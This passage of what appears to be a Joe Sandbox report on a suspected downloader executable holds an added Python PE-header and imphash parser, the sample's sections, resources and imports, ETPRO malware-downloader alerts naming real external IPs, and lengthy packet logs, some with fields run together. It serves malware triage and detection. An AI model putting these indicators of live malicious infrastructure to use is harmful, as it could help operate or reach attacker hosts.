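The static fields above (entry point, image base, subsystem, image file characteristics, DLL characteristics, time stamp, import hash) are read straight from the COFF and PE32 optional headers. As an added example, not part of the Joe Sandbox report, the Python below parses those fields from a PE32 image, decodes the two characteristics bitmasks and the TimeDateStamp the way the report prints them, flags the case where DYNAMIC_BASE is set but RELOCS_STRIPPED means the loader cannot actually rebase the image, and computes an import hash from an import list using the common imphash recipe. Instead of reading MC8017774DOCS.exe it builds a constructed header whose values mirror the report; the bitmask values 0x010F and 0x8540 are derived from the listed flag names (an assumption), and the imphash routine omits the ordinal-to-name tables full tools carry.

```python
"""Added example (not from the Joe Sandbox report): parse the PE32 header
fields a static-info listing shows, and compute an import hash (imphash)."""
import hashlib
import struct
from datetime import datetime, timezone

# Bit values from the PE/COFF specification (subset).
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT", 0x0200: "NO_ISOLATION", 0x0400: "NO_SEH", 0x0800: "NO_BIND",
    0x1000: "APPCONTAINER", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}
SUBSYSTEMS = {2: "windows gui", 3: "windows cui"}

def decode_flags(value, table):
    """Names of the set bits, lowest bit first (the order the report prints)."""
    return [name for bit, name in sorted(table.items()) if value & bit]

def format_timestamp(ts):
    """TimeDateStamp is seconds since the Unix epoch; render it as the report does."""
    when = datetime.fromtimestamp(ts, tz=timezone.utc)
    return f"0x{ts:08X} [{when.strftime('%a %b %d %H:%M:%S %Y UTC')}]"

def parse_pe32_header(data):
    """Read the COFF header and the PE32 optional header of an image in memory."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    coff = e_lfanew + 4
    _machine, _nsections, ts, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                   # COFF header is 20 bytes
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (magic 0x10b) is handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    return {
        "Entrypoint": f"0x{entry:x}",
        "Imagebase": f"0x{image_base:x}",
        "Subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "Image File Characteristics": decode_flags(chars, FILE_CHARACTERISTICS),
        "DLL Characteristics": decode_flags(dll_chars, DLL_CHARACTERISTICS),
        "Time Stamp": format_timestamp(ts),
        # ASLR needs both the opt-in bit and relocations; stripped relocs pin the base.
        "ASLR possible": bool(dll_chars & 0x0040) and not (chars & 0x0001),
    }

def imphash_string(imports):
    """Text that imphash digests: 'dll.func' per import, comma-joined.
    imports: list of (dll name, [function name or ordinal int]). Assumption:
    the ordinal-to-name tables full tools keep for a few system DLLs are
    omitted, so an ordinal import is rendered as 'ordN'."""
    parts = []
    for dll, funcs in imports:
        dll = dll.lower()
        for ext in (".dll", ".ocx", ".sys"):
            if dll.endswith(ext):
                dll = dll[: -len(ext)]
                break
        for func in funcs:
            name = f"ord{func}" if isinstance(func, int) else func.lower()
            parts.append(f"{dll}.{name}")
    return ",".join(parts)

def imphash(imports):
    return hashlib.md5(imphash_string(imports).encode()).hexdigest()

def build_constructed_header(entry, image_base, ts, chars, dll_chars, subsystem=2):
    """Constructed, minimal PE32 header (no sections, no code) that only exists
    to exercise the parser; the caller picks the values to mirror the report."""
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry)
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<HH", opt, 40, 4, 0)            # OS version 4.0
    struct.pack_into("<HH", opt, 48, 4, 0)            # subsystem version 4.0
    struct.pack_into("<HH", opt, 68, subsystem, dll_chars)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, ts, 0, 0, len(opt), chars)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)           # e_lfanew
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    # Values mirror the static info above; the header itself is constructed.
    hdr = build_constructed_header(0x40336C, 0x400000, 0x5A6FED1F, 0x010F, 0x8540)
    for key, value in parse_pe32_header(hdr).items():
        print(f"{key}: {value}")
    print("Import Hash:", imphash([("KERNEL32.dll", ["GetProcAddress", "LoadLibraryA"])]))
```

To apply it to a real file, pass `open(path, "rb").read()` to `parse_pe32_header` and the parsed import table to `imphash`. Two caveats a practitioner should keep in mind: an imphash is only comparable across tools that use the same ordinal handling, and the "ASLR possible" check is why a DYNAMIC_BASE flag on a RELOCS_STRIPPED image with an empty base-relocation directory still loads at its preferred 0x400000 base.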
                                                                                                                                                   Name                                  Virtual Address  Virtual Size  Is in Section
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_IMPORT          0x84fc           0xa0          .rdata
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c7000         0x17000       .rsrc
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_IAT             0x8000           0x2b0         .rdata
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                                                                                                   IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6400 | 0x6400 | eed0986138e3ef22dbb386f4760a55c0 | False | 0.6783203125 | data | 6.511089687733535 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x39eb38 | 0x600 | 09e0c528682cd2747c63b7ba39c2cc23 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a9000 | 0x1e000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3c7000 | 0x17000 | 0x17000 | c8f8279129ad38fd03ee7b50a97e5aea | False | 0.21903659986413043 | data | 5.096977274603887 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_BITMAP | 0x3c7388 | 0x368 | Device independent bitmap graphic, 96 x 16 x 4, image size 768 | English | United States | 0.23623853211009174
RT_ICON | 0x3c76f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.16976221459836743
RT_ICON | 0x3d7f18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.32863070539419087
RT_ICON | 0x3da4c0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.42424953095684803
RT_ICON | 0x3db568 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.30730277185501065
RT_ICON | 0x3dc410 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.32445848375451264
RT_ICON | 0x3dccb8 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.2579479768786127
RT_ICON | 0x3dd220 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6374113475177305
RT_DIALOG | 0x3dd688 | 0x144 | data | English | United States | 0.5216049382716049
RT_DIALOG | 0x3dd7d0 | 0x13c | data | English | United States | 0.5506329113924051
RT_DIALOG | 0x3dd910 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3dda10 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3ddb30 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3ddbf8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3ddc58 | 0x68 | data | English | United States | 0.7211538461538461
RT_MANIFEST | 0x3ddcc0 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-25T07:09:51.498327+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.6 | 49801 | 185.244.144.68 | 80 | TCP
2024-11-25T07:09:55.095980+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49808 | 132.226.8.169 | 80 | TCP
2024-11-25T07:09:57.783587+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49808 | 132.226.8.169 | 80 | TCP
2024-11-25T07:09:59.525079+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49821 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:04.799293+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.6 | 49826 | 132.226.8.169 | 80 | TCP
2024-11-25T07:10:06.599757+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49838 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:18.087506+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49871 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:21.452984+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49882 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:24.723371+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49890 | 172.67.177.134 | 443 | TCP
2024-11-25T07:10:28.422026+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.6 | 49902 | 172.67.177.134 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                  Nov 25, 2024 07:09:51.921392918 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.921442986 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.921490908 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.929718971 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.929780960 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.929811001 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.929867983 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.938102007 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.938158035 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.938219070 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.938262939 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.946465969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.946518898 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.964025974 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.964076996 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.966109037 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.966156960 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.966272116 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.966317892 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.974522114 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.974598885 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.974627018 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.974673986 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.982873917 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.982933998 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.982986927 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.983036041 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.991663933 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.991777897 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.991796017 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:51.991837025 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:51.999943018 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.000013113 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.000103951 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.000149012 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.007069111 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.007083893 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.007222891 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.013919115 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.013932943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.013983011 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.014008045 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.020833969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.020844936 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.020894051 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.027893066 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.027947903 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.028084040 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.028126001 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.034358978 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.034420013 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.034451008 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.034502029 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.040967941 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.041019917 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.041055918 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.041110992 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.047240019 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.047303915 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.047350883 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.047399998 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.054677010 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.054691076 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.054923058 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.058231115 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.058243036 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.058281898 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.062829018 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.062899113 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.063003063 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.063086033 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.067527056 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.067576885 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.067692995 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.067739964 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.072464943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.072513103 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.072640896 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.072793007 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.077146053 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.077157974 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.077240944 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.081676006 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.081736088 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.081850052 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.081891060 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.086381912 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.086548090 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.086564064 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.086611032 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.090672016 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.090719938 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.090732098 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.090779066 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.095611095 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.095659971 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.095748901 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.095799923 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.098978043 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.098992109 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.099050045 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.102035999 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.102049112 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.102447033 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.105248928 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.105262041 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.105310917 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.108256102 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.108270884 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.108324051 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.108355999 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.111346960 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.111361027 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.111411095 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.111427069 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.114413977 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.114583969 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.114609957 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.114634991 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.117548943 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.117732048 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.117774010 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.117815018 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.120630026 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.120644093 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.120968103 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.123696089 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.123789072 CET4980180192.168.2.6185.244.144.68
                                                                                                                                                  Nov 25, 2024 07:09:52.123855114 CET8049801185.244.144.68192.168.2.6
                                                                                                                                                  Nov 25, 2024 07:09:52.124102116 CET4980180192.168.2.6185.244.144.68
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 25, 2024 07:09:52.126837969 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.126910925 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.127026081 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.127074957 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.129522085 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.129573107 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.129647970 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.129688978 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.133584023 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.133599043 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.133634090 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.133646965 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.136178970 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.136353970 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.136414051 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.139379025 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.139395952 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.139446974 CET  49801        80         192.168.2.6      185.244.144.68
Nov 25, 2024 07:09:52.142416954 CET  80           49801      185.244.144.68   192.168.2.6
Nov 25, 2024 07:09:52.142465115 CET  49801        80         192.168.2.6      185.244.144.68
